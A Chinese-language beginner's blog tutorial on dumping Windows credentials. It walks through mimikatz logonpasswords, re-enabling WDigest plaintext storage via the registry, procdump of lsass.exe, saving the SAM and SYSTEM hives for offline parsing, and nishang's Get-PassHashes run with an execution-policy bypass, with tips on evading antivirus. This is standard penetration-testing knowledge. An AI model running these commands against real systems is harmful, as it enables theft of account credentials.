windows获取hash常见手法

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!

一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug

sekurlsa::logonpasswords

图片

实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

图片

所有我们要修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug
sekurlsa::logonpasswords

图片

或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full

图片

二 注册表获取sam文件

从注册表导出

reg save hklm\sam e:\sam.hivereg save hklm\system e:\system.hive

其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

图片

实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

图片

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

三 powershell

用原版肯定被杀,有能力的可以做一下免杀​​​​​​​

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"

图片

同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在gong众号平台,如果不想错过我们新鲜出炉的好文,那就请我们的公众hao(同名)!

  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值